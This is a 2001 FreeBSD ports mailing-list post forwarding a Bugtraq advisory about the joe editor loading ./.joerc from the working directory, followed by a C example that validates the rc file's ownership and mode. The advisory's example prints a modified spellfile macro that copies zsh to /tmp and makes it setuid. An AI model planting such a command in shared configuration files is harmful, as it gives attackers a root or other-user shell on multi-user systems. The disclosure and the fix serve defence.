Date: Wed, 28 Feb 2001 11:05:53 -0600 (CST)
From: Kevin Day <toasty@temphost.dragondata.com>
To: ports@freebsd.org
Subject: Joe's Own Editor File Handling Error (fwd)
Message-ID: <200102281705.LAA78614@temphost.dragondata.com>

I'm working on a patch for this right now, don't FORBID the port yet. :)

-- Kevin

Forwarded message:
> From owner-bugtraq@SECURITYFOCUS.COM Wed Feb 28 10:54:24 2001
> Approved-By: beng@SECURITYFOCUS.COM
> Delivered-To: bugtraq@lists.securityfocus.com
> Delivered-To: bugtraq@securityfocus.com
> X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001
> X-MIMETrack: Serialize by Router on tracy/Wkit(Release 5.0.4a |July 24,
>  2000) at 2001-02-28 15:13:46
> MIME-Version: 1.0
> Content-type: text/plain; charset=iso-8859-1
> Message-ID: <OF61B9B540.D6BC1630-ONC1256A01.004D1564@wkit.se>
> Date: Wed, 28 Feb 2001 15:13:42 +0100
> Reply-To: advisories@WKIT.COM
> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
> From: advisories@WKIT.COM
> Subject: Joe's Own Editor File Handling Error
> X-To: submissions@packetstorm.security.com
> To: BUGTRAQ@SECURITYFOCUS.COM
> Content-Transfer-Encoding: 8bit
> X-MIME-Autoconverted: from quoted-printable to 8bit by temphost.dragondata.com id KAA77924
>
> WKIT SECURITY AB
> www.wkit.com
>
>
> TITLE: Joe's Own Editor File Handling Error
> ADVISORY ID: WSIR-01/02-02
> REFERENCE: http://www.wkit.com/advisories
> CVE: GENERIC-MAP-NOMATCH
> CREDIT: Christer Öberg, Wkit Security AB
> CONTACT: advisories@wkit.com
> CLASS: File Handling Error
> OBJECT: joe(1) (exec)
> VENDOR: Josef H. Allen
> STATUS:
> REMOTE: No
> LOCAL: Yes
> VULNERABLE: Joseph Allen joe 2.8
>
> DATE
> CREATED: 26/02/2001
> LAST UPDATED:
> VENDOR CONTACT:
> RELEASE: 28/02/2001
>
> VULNERABILITY DESCRIPTION
> joe looks for its configuration file in ./.joerc (CWD), $HOME/.joerc, and
> /usr/local/lib/joerc in that order. Users could be tricked into executing
> commands if they open/edit a file with joe in a directory where other
> users can write.
>
> CONDITIONS
> User using joe in a world/group writable directory.
>
> EXAMPLE
> A user copies the default joerc file to a world writable directory and
> changes
> :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp",rtn,retype
> to
> :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty >/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype
> Another user opens a file in that directory with joe and runs ispell with
> ^[l; the result is a suid shell in /tmp
>
> SOLUTION/VENDOR INFORMATION/WORKAROUND
>
> DISCLAIMER
> The contents of this advisory may be distributed freely, provided that
> no fee is charged and proper credit is given. Wkit Security AB takes
> no credit for this discovery if someone else has published this
> information in the public domain before this advisory was released.
> The information herein is intended for educational purposes, not for
> malicious use. Wkit Security AB takes no responsibility whatsoever for
> the use of this information.
>
> ABOUT
> Wkit Security AB is an independent data security company working with
> security-related services and products.
>
> Wkit Security AB
> Upperudsv. 4
> S-464 72 Håverud
> SWEDEN
> http://www.wkit.com
> e-mail: advisories@wkit.com
>
> (C) 2001 WKIT SECURITY AB

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-ports" in the body of the message
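
The condition in the forwarded advisory, a ./.joerc that another user was able to place in the working directory, can be gated by checking ownership and mode on the opened file before it is parsed. The following is an added example, not code from joe, from the FreeBSD port, or from the patch mentioned in this message; `open_trusted_rc` is a hypothetical helper, and falling back to $HOME/.joerc is an assumed policy.

```c
/* Added example: open_trusted_rc() is a hypothetical helper, not joe code. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for O_NOFOLLOW under strict -std= modes */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Return a read-only descriptor for `path` only if the file can be treated
 * as the invoking user's own configuration; return -1 otherwise. */
int open_trusted_rc(const char *path)
{
    struct stat st;

    /* O_NOFOLLOW rejects a symlink as the final component; O_NONBLOCK keeps
     * a FIFO placed under that name from hanging the editor at startup. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;

    /* fstat() the open descriptor, so the object that passed the checks is
     * the object that is read, even if the name is replaced afterwards. */
    if (fstat(fd, &st) != 0 ||
        !S_ISREG(st.st_mode) ||                  /* regular files only */
        st.st_uid != getuid() ||                 /* created by someone else */
        (st.st_mode & (S_IWGRP | S_IWOTH))) {    /* others can rewrite it */
        close(fd);
        return -1;
    }
    return fd;   /* caller parses the configuration from this descriptor */
}

int main(void)
{
    int fd = open_trusted_rc("./.joerc");
    if (fd < 0) {
        puts("./.joerc absent or untrusted: skip it, use $HOME/.joerc");
        return 0;
    }
    puts("./.joerc is caller-owned and not group/world writable");
    close(fd);
    return 0;
}
```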